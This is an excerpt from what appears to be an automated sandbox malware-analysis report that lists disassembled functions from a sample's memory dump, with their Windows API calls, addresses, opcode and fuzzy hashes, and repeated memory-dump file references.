                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DialogNtdllProc_
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3239928679-0
                                                                                                                                                        • Opcode ID: c1c687cf42eb02443dcabb8dbedaf3d6e46cd10bb339661843974bae17b03ded
                                                                                                                                                        • Instruction ID: 72e91a03836730afeff3205c7f73feab2510326c7c27f5c2c45c49d037db9e2f
                                                                                                                                                        • Opcode Fuzzy Hash: c1c687cf42eb02443dcabb8dbedaf3d6e46cd10bb339661843974bae17b03ded
                                                                                                                                                        • Instruction Fuzzy Hash: 1CF06D32240259AFDB21DF58DC05FD63BA5FB05761F048458BA15672E1CB716820D764
                                                                                                                                                        Function 00AAAC99 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00AAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00AAAF8E
                                                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,?), ref: 00AAACC7
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DialogLongNtdllProc_Window
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2065330234-0
                                                                                                                                                        • Opcode ID: 1c321acc29c3bfe51e3c849f7ed47258686225d50f8faa7785c58ab79a747c34
                                                                                                                                                        • Instruction ID: ec21318f3caebbbf186de7eef793d992c2665bfcbcc7dacb6e307cdcdc1b4f67
                                                                                                                                                        • Opcode Fuzzy Hash: 1c321acc29c3bfe51e3c849f7ed47258686225d50f8faa7785c58ab79a747c34
                                                                                                                                                        • Instruction Fuzzy Hash: 02E0EC35140208FBCF15AF94DC51F683B66FB59354F108459FA054B2A1CB73A522EB51
                                                                                                                                                        Function 00AFF425 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,00B0F3D4,?,?,?,?,?,?), ref: 00AFF450
                                                                                                                                                          • Part of subcall function 00AFE13E: _memset.LIBCMT ref: 00AFE14D
                                                                                                                                                          • Part of subcall function 00AFE13E: _memset.LIBCMT ref: 00AFE15C
                                                                                                                                                          • Part of subcall function 00AFE13E: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00B53EE0,00B53F24), ref: 00AFE18B
                                                                                                                                                          • Part of subcall function 00AFE13E: CloseHandle.KERNEL32 ref: 00AFE19D
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _memset$CloseCreateDialogHandleNtdllProc_Process
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2364484715-0
                                                                                                                                                        • Opcode ID: 28f5cee40bab5cf6005d38286baecd14d02c37bc1e16847299ec871ce65bb3b3
                                                                                                                                                        • Instruction ID: cc0317ab506df32b6a161db2ea575eec9b773767613348e9eaa2ecb83c56403d
                                                                                                                                                        • Opcode Fuzzy Hash: 28f5cee40bab5cf6005d38286baecd14d02c37bc1e16847299ec871ce65bb3b3
                                                                                                                                                        • Instruction Fuzzy Hash: 31E01231110208DFCB11EF88DC04EAA37B2FB08341F008050FA01572B1CB31A820EF50
                                                                                                                                                        Function 00AFF3AB Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • NtdllDialogWndProc_W.NTDLL ref: 00AFF3D0
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DialogNtdllProc_
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3239928679-0
                                                                                                                                                        • Opcode ID: 2e7355bc0ca166f4570d77eba903601f5f9a3cfaecd51dfd8a6157aa96c9e5f8
                                                                                                                                                        • Instruction ID: 4ae0a078be8cf75048a9e841b2bbd36276976620201a96626a728e93d4aba47c
                                                                                                                                                        • Opcode Fuzzy Hash: 2e7355bc0ca166f4570d77eba903601f5f9a3cfaecd51dfd8a6157aa96c9e5f8
                                                                                                                                                        • Instruction Fuzzy Hash: DFE0E23420020CEFCB01DF88D844E8A3BA5FB1A350F004094FD048B262CB72A820EBA1
                                                                                                                                                        Function 00AFF37C Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • NtdllDialogWndProc_W.NTDLL ref: 00AFF3A1
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DialogNtdllProc_
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3239928679-0
                                                                                                                                                        • Opcode ID: 353f72b2a459c2407eb1189226af20b97ee758ed52763a12d408b002853f5564
                                                                                                                                                        • Instruction ID: 9e470303c7122b3d40a68d5f95b84fd678a23a25a11632523b89e62019620c4f
                                                                                                                                                        • Opcode Fuzzy Hash: 353f72b2a459c2407eb1189226af20b97ee758ed52763a12d408b002853f5564
                                                                                                                                                        • Instruction Fuzzy Hash: 27E0E23420420CEFCB01DF88D844E8A3BA5FB2A350F004094FD048B261CB72A820DB61
                                                                                                                                                        Function 00AAB845 Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00AAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00AAAF8E
                                                                                                                                                          • Part of subcall function 00AAB86E: DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00AAB85B), ref: 00AAB926
                                                                                                                                                          • Part of subcall function 00AAB86E: KillTimer.USER32(00000000,?,00000000,?,?,?,?,00AAB85B,00000000,?,?,00AAAF1E,?,?), ref: 00AAB9BD
                                                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,00000000,?,?,00AAAF1E,?,?), ref: 00AAB864
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Window$DestroyDialogKillLongNtdllProc_Timer
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2797419724-0
                                                                                                                                                        • Opcode ID: ca499ba5a2aea2bd08bb64367a42f0ac39775e400ed238d8e4f0335fc421017e
                                                                                                                                                        • Instruction ID: ef8b0a771bd240095e6de1d21fa5f3436a2043325753c8056e001a4b74243a60
                                                                                                                                                        • Opcode Fuzzy Hash: ca499ba5a2aea2bd08bb64367a42f0ac39775e400ed238d8e4f0335fc421017e
                                                                                                                                                        • Instruction Fuzzy Hash: 36D0127118430C77DB102B65DD07F4D7A5EAB15751F408421FA056B1E2CB7264109565
                                                                                                                                                        Function 00AB8E19 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00AB8E1F
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3192549508-0
                                                                                                                                                        • Opcode ID: 3e27e88905a2393eb9ec4096fd91c93afe6810c1a521af9cc91dc54a50c41df6
                                                                                                                                                        • Instruction ID: 13f71073e4ea7e2e3f1ceaa3f620c2e4bcd29c809b0b408e686cb78b51cca6fb
                                                                                                                                                        • Opcode Fuzzy Hash: 3e27e88905a2393eb9ec4096fd91c93afe6810c1a521af9cc91dc54a50c41df6
                                                                                                                                                        • Instruction Fuzzy Hash: 4BA0123000050CA78A001B51FC044847F6CD7041507408010F41C01021CB3354104585
                                                                                                                                                        Function 00ABA937 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetProcessHeap.KERNEL32(00AB6AE9,00B467D8,00000014), ref: 00ABA937
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: HeapProcess
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 54951025-0
                                                                                                                                                        • Opcode ID: cf4aaa9ff2071ebacdb6ef3805598f9ceefcf21614f97d20890965d8d7f8e10f
                                                                                                                                                        • Instruction ID: 5b536f11215bb9542e2cdb5f415b0246551fd94a314fb2a4c07a4eec43c1329f
                                                                                                                                                        • Opcode Fuzzy Hash: cf4aaa9ff2071ebacdb6ef3805598f9ceefcf21614f97d20890965d8d7f8e10f
                                                                                                                                                        • Instruction Fuzzy Hash: 0DB012F07032034BD7084B3CAC5429E39D45789202341807D7403C3560DF308420DF00
                                                                                                                                                        Function 00AB0EC4 Relevance: .3, Instructions: 345COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                                                                                        • Instruction ID: 422c92e37a84fd0bd7deeea60af2656a1df043facff242247779199923cc39da
                                                                                                                                                        • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                                                                                        • Instruction Fuzzy Hash: 16C1C27220529349DF2D473EC4348BFBEA95AA27F131A0B6DD4B3CB4C6EE24D564D620
                                                                                                                                                        Function 00AB12F9 Relevance: .3, Instructions: 341COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                                                                                        • Instruction ID: 57c9843a5601d4003124a0c714c95ce547aa97613b7c8f12504ec73d9915d870
                                                                                                                                                        • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                                                                                        • Instruction Fuzzy Hash: 6DC1C3722052934ADF2D4739C4348BFBFA95AA27B131A476DD8B3CB4C6FE24D524D620
                                                                                                                                                        Function 00AB0A8F Relevance: .3, Instructions: 331COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                                                                                        • Instruction ID: 321bdefa8d69cb18231f7c36d33f3eef4872f4d040a2632cbff053298a6f738a
                                                                                                                                                        • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                                                                                        • Instruction Fuzzy Hash: BFC1B17220529349DF2D473984348BFBFA95AA27F531A4B6DD4B3CB4C2EE24D524D620
                                                                                                                                                        Function 00AB0677 Relevance: .3, Instructions: 323COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
